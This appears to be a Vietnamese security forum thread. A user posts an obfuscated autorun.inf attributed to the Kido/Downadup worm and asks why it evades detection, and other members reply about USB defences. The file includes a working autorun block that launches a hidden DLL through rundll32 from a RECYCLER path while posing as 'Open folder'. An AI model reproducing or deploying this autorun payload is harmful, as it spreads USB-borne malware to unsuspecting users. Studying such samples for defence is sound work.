 UVfsaIDiQkm=  UwxYJZwWNbHIyXvS 

 Cr  = AEZsMSdVVTHs
;LdäcušaCtlT

 xKtllBnzJrkdSYRUvIYwciWVc = wQQdSFyDhWtUXAdNxoDawVfr  
;  û÷mSÄ÷™vmntGZL  
;   



 


 QxrlzMA = USeZdNBPlDXcIe  
 





DvsontDnc =WyXRNrjf  
; ¬Nù‹½k×·ÎÐÖ‰EpOÅK 
 





GLYIZpFMQh =V



; cF¦LgtGoòF½¦ì¤qL·ëß‚˜Mp   


;  
;   

lukQZtFsGCgGaKeETMCuKS  = JajVetuGe 

;QèR—ƒY¶eêIOh²B¨FÕÒeM  



tHZPYDSHWJJgBDCLylvth = YbBxPRSnjDWRnpAuLxm   
;b¯þ 

  uHhmhEgColbC =bOiYgNyLSNOgpwExZQIwzjxj
 
 
; YTØKdìqÆeEþJrK¿w»„à„©qÛhmnYGØ›XIyúdWõz¢¯ZnYSæèYfÞêGc 
 

gmuKkdcj  =qrVIZXTIg 

zkJGjDbphQ  =HslAsGXbuHPIY 

; ؾoTOŽqŽi’LbÜFßsA  

  qQoZaElSMnDlKZOdLXUkSLsGl= dXTrzFEScskizJHz
 [ rHpRNDcPmlC]


 IFuKkuAgnkQYCA  = AtqqRHozqqZqOfTg 

;  b¨Ù³èËzooX¿XËmQHOYHN¥mfKØBcwrºáîn²gMyµØ΁ÒØjsZ 
;  

;
MZoVGTgv  = uswwmcN



;yqDBMŽkÀÂAhB¢ìÒ…AÀz€iHj  
 YKEuRDVOSQLbGKPutSEFqKXIt  = kjRPJsNFunrFoGmHfSb  
;  ûlzSkyGXTÖZzðZsyB
 RBPrTxEGvAcc =dbaF 

; 
;




 

  AVCJRgKtSKRWRlIIPaORFI=WvaFszhYAlxbTcTbSYMM




;   FèWŽþ½¿çªr’Zø÷N 
; 
;ŠÏYãy‰Inó“üöéñxnPî¥Nƒw

jvgTulCIJsWxCdhM=  zyEHlybQvlzXwEtFUZiKczgo  


;  ©žÇ¿“k±ÂSZÄkóXpu¸°ÉPpêi–K‘SÂôôõcP¤ÂFêÚhÂVèŒÒdéûá’¹†
nfulfKLpjaUHxSlUWDvGAWT  =  PlMcVePWaYINWIFgZu 

;±¯úñoA½bJÆøz 
 

;ÂGr檶«z¬ÀFZ¥DQVUøå¨GK¼ßBØBNXKJÆ 

 evfhhDgen =  TtvsLuUHdwFhcBFZN
;µÎ»fµ¾GV‰fžä¥¥¥g°BGEnRX 
;  R“¦å   
 LVwNOnleV = Go
 



;  
;   r¥Xghb‡i’DsœTµ³zU“khthto²e¡lräS
iprqRKY =sAHsw

;
;  ˆÀo¿qjÖÿsàdzBDüH¼RqÇjÞ  


 WfjJVQzeuUIhZ=  qZbGyUbDbsHEOsCMbHT




; eæ¨jHÔXE¯R¸D 
; 
   


KsfKnuijJBCWqmHQvKntM =fbNrkFxrQjNSDXKxHtsRWdy 
 TtVDSsmayAlEwkOwltMNSSp= kJpgF


  
[tUjzVcrZcppWTq
;  nwZ¢Ã¬Ñ…ÁÁà§á®ôvwH½úøCˆ¥Pr v†LkâVG€Ê™›Tl²EŠomLQšÙO
 



 KadBmdwTNNmSgouATJ   = yxswInmOpqRR 
  PbtATuUjKUmNciH= uXZTfwTGWHVsjvxtXe 
; ›VNIVÝUìÿxwHZqÚqõJOvnVŸÀRðW
;  
;Bh³›ÎWàLFcüõüþoGX¿Õö 
yDfVoIBLKpE= fv   
  sMqOKciMANOIgfawbu =edKLvuzrSitXZKXpp
; ˜µÈTEGiFçZµzQGvdªÀGÚƒyæGÞeÓ€‘USÏHBþW  


RmPzjXKPbeKtNfFM =HmpZa

;  OÉü‚FmÙDÖuMpÛÌHjz˜ÑW­çUÃXÎv—Qã³rÉzDOK¯—XzÙXáxjh˜HXj”wMâEm 
 
 

tKix=  JtKJcoLA 
;æi÷fAmài±bÇuŠFV–qšzDï˜t¯xãhõSÉõ


; r Iëlbé›HW‚ålýìFXsRt 
;ιéw¢ 
  DH  =cBNJvHZJFEvQdk 
 
  



  JzkQ  =steMCm 
; HswálÝB¶h°šŸN£ÛW™óeLQtbÒE‘A±Eýa…€š’BJ¸ªôIvºYcPW 

aIOGdhvhbmqErxydDaSFB= CEovbSNjCwzyJAH 
 
 

S =  SfumSUBaWuZAoLYdBOSKbSc
;  

;    
;  KNmcxA³Œ¬mxRPfûzÍkræõiC  

; ØRj­AeµŒ½£¨UÕnoåvªß 
;¦MMZÎkrwföŪ٧²AqNêrpäU

gVc =CQ
;  
; Ɛçë¸Wâ§nì 

 UVlfcpCHEDzJBvET=  CKCbSMHzm  
;  Ú€P cGȐÞFÄaϏqQÐàáƸf¦

 



; Lk­Ï¡W€ÅpNRLétïÃèSUlͬñvïrq€Tu 


nUVXGiM=MOvlzQgXTKgxVuVuM

;  lmådjIè¯Ußv×Ãwhe 

 FDit =  sYV
D= YAJ 
  
; kHºFYôH¨ÉQK»—JhVôN‹ËU¼LÌPzÿhx¦ˆk‘ 
dFPptvEDXkHVXDsLjywdQb= SicUOQuywILoENRXaxThyB 
;rcàtÃcJÜ¡IAáGÆ£I‘HãLoÚJ™•ecU 

;  ”mN³wŒ©Záãžb™IJº•»ÄÆlˉ˜”ðÕKCÂsšýS‡nëaGjp›RkpS¥o 
 [ ZcGCjgUVJLzumth

 

;  

 


qoWJQReMdLvmtLC =qjIcLkhVNvWC  



 YszurHdjBBRybx =  LRRcW



 
  
wrxhyKE =tCseGZbkIoo

 
; UvJ”æi’ëwCî°
; “劉ݲJòzQVuJW½qДAH¼‰ˆR 

  YBWqWezxuSvPARNPoRnbyMJ= fqlP
;­ñKAÎGq½ðZ‹  


;  
  mlEpOMpKblsLTzuJ   =   wNbgD

;¨eàjPV´uêŸaŒºt±bëæ 



ukfnYGdWGuZxtEIF=ybS




;PW÷EüNéŠZ™xwyNsnï™jy–JGoFgoŒdBH»Ha 
sEXqZUtoZSVcijWMSakCN=IFEiNPxHZ
;
; ôcÜ¥¯¾L§˜ÔqsËWukxHÖTdPvý»ÓAœ

 

  [tIzSfrYI] 



  

 
JVwtaYUSxAKBwIybrmzhMMkLk=AnDdolGMjfptk

;yÄ·ÞNWÁ½®TyÚow€eÜüìo—ಛGnÞD§o´¸gZUŒ  
  
;ÔCjkRÍs•æraVˉm¨Ùב°‰¨®îl¯b¡„ŠùQm«  
; nk®º¾YçG¸ÌáÁOß

  XqqEpCXiKiDnTiQq  =EiRdxzMeszAeLnGZPCpSWr  
;   dlRÈ«‹šd±æöó’KUŒ”r«x¯Ê°yBȝ¤wh 



 


 
  qOSwnxUNhptx = lAIlIk 
; ¾I
;  ɏˆt” p‚l—aLðC¸
  
Mju =  vVJZKU
 aKzDuWa= DGoEhWzHevcrUgVOgU 



  WxgnPqHIKwUXT= jUuffXWfJcSryqSfbtjvRPli
;lÁxô¤zp¼FÀéH©³Tl 
;¤YfÀ¯ñ¡rþ³çxqleerîHü™T£ 



;   HsVqDV›dbó
;pÛGÁÅÉhi¡ûEúKrÆgMXJµÔ‘¥s

QMgUwjxhRhcnFQC=ywoAScVrDlT  
;  „uXJÖwÌÂŽuÆøѬPK¨UµVIÆ™AodôWE ¨zÞVJáÓàeûý
;  
lAXDfZvmZRjUEDzIlmeksW=yCQiQKQueOpunGxbz 


 pKjnXQFpKXMqKfjlCSNgJW=xgIIkkIJRbcE 




;jpžzDßْ幌  



  [COLOR="red"][AUTorUN[/COLOR]

; ÅA¯˜ölÜŠq¦…tÎKVWœý¸¤¬ 
 [COLOR="red"]AcTION   =Open folder to view files[/COLOR]




 



  [COLOR="red"]icon = %syStEmrOot%\sySTEM32\sHELL32.Dll ,4[/COLOR]

 
;­Pr×SoàDWWCfDnhTvVQyažã¾ 
;«GáÊ 


; qTJ¥·r€ÕoÍgwDqçÚJûKEí´û  

[COLOR="Red"]shelLExECUte =RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\[/COLOR]jwgkvsq.vmx,ahaezedrn
; zD¾pl¿›cà½ÂuDbËyF½žÚG  


;f›yÊlÌÃèŠdGµBwAsUmF  
;  »Ÿobz²q•GEìªiSøµväF˜Ø¤ò¼fîNŒDs±  



[COLOR="Red"]useAuTopLAY  =  1[/COLOR]
; Fª†g•¿úoÖMÊc°­¹tYcÈìkdQeæØnD§äâÙrˆe…C¿ùlÝ„ôC   
  [ oiw]  



;  

;ñ…Ïq¨YPhÖ‘±jHÙE¼€PšxEAb«¬µÞ˜ãñIzg›AÉdǸæĆ•‘bçÇ 
  blGkNaAOAStfJarztHQsDTE =  X 

;  

; Cnˆº´ðôãƒke´j÷gWÚ©ÖçJÇtþ¨iMUÒŽ‘çtáæVJd

; UNÜaBYùfsÊ c¢a’nGHP¯TpZ¢wo 
; ûÀzñIhMÖùîVÛXeäõÖrGa§”Z“FySÝIIUìHk¸¡ÍE®fWˆÞLÅ 

ljjpceByfnCqlEdvFuiQtTXOX  =  DsuZYNfdNfgLkgdubp 

;JYcGŽRügMÖçwœÛF¨kkZ¤½ZdCnd³JedsTÞýe


;   娦AsüNHnÝóZWn gíUK®ÞH›nX 


;   HtEàGû¿†¶siâS‘‰dpšžöD‰ßX»ZeHòhC 

AHBpQMGeNELqWqgVFUI =thvu




 t =en


  


ZpmLWwdy =p 

; D³‡™½âafRýPÒeIòmsbLP×UdggÒÒ‚hÔE¹JFâi°¶BHhu 

JirRwHUIcdygM =Dw  



 
yAPlzwzDWOQuOkdjb= fTwwFgsQkIuovohIAEhoMk
; J«O¨ƒ™ÏQ¿CþfCaz¸Âo‹ 
LkgTMQccsQukegpqMJbGmC  = NiaNYPlDZlrMApJYhSxkUPAp 

; ÀSÆgZ†Yuf¾KösxaÞÛXàAcfEÿf«çj·lI½®¿zuÈÑqCýkDWVìFÏPoF¥bÞ™   
;  

;  U‚XÖßvXé®o…¹AG±

 
 

 Df =EEKpaGzdkYcdqw


;   ‘úNѬiôpívCÃcRDm—BVh¤ôgaWRq³xAšenAGÝpZtnMG¶W 
;HÖŠJxcâQ×nIãl‘UÉð‡ÐÚLŸch±îŸÇ–½Ë‚Ÿ 
; pgk³²h¶¾Yár—еa‚†ÂJDGlAkuy¯çSÝEofmj
  tYtGgOcpNmnREFeVOVYcmXi =BMlhoTHAdQ 
 wu  =jgQDsI


;  
; ‘ÃMC¤rALNÌmp  

;¦ßw‚µáîÊhbUKÂZÄÄÃlC³  


   
 MEcDYfriSGlkppcZPDzO  =O  


;  
 


Không tài nào đọc xuống bên dưới để tìm tới đúng tên Malware được.

autorun.inf này là của thằng Kido Downadup tạo ra.

Nhờ các bạn giải thích tại sao nó lại qua mặt được. Và cho mình biết cách khắc phục.

Cảm ơn.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
me too ! How can I fix it ?
Thảo luận hệ điều hành Windows  Empty  Go to message
Ý tmd là thử xem USB ngay lúc đó có Safe Remove được hay không. Hay là cũng bị như thằng ổ cứng kia. Thử với các trường hợp trước sau.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Hey bồ, vụ Dump tui chưa biết à nha. Share cho anh em luôn xem nào.
Tỉ mỉ tí nha smilie
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
@mars2008:
Có rất nhiều cách để "chiếm chỗ" file autorun trong USB.
Nhưng cách của bạn xem chừng là phòng thủ "yếu" nhất.

PS: có mấy tác giả đem con bỏ chợ. Post bài hỏi cho đã rồi lặn luôn.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Con này có khả năng kèm autorun.
Bạn down và chạy http://www.box.net/shared/zm98y3dr0f, có thông báo Autorun thì đừng tắt, gửi lên đây nha.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Ý anh conmale là bồ post source lên rồi phân tích và bình luận theo hướng bảo mật ấy. Nhưng mà phải đủ kiến thức để phân tích và bình luận nhé, chứ đừng "đem con bỏ chợ".

Nếu làm được thế thì ở đây tuy khó nhưng có lẽ sẽ hoan nghênh đấy.
Góp ý và Hỏi đáp thắc mắc chung  Empty  Go to message
Vậy đặt pass cho 1 mẫu malware như thế nào thì được gọi là chuẩn ? (để không phải bị liệt vào mấy khả năng như bác PXMMRF nói trên)
Và cách thức hỏi hoặc share để cùng phân tích ra sao thì ổn ?

Nhờ các Mod nói rõ luôn cho mọi người nắm.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
@tdplaza:
Mình thử thì đúng là nó khóa USB thành công.
Thanks!

@Emerald214:
Bạn cũng thử chạy cái mở khóa thử xem sao hen.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000 
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Bạn không gà. Có điều bạn không chịu kiểm tra thôi.
Có thật có giả. Có nhiều cách để xác định thật giả.

1) Google
2) Search trong máy sạch và so sánh
 
Go to Page:  First Page Page 3 4 5 6 8 9 10 Page 11 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|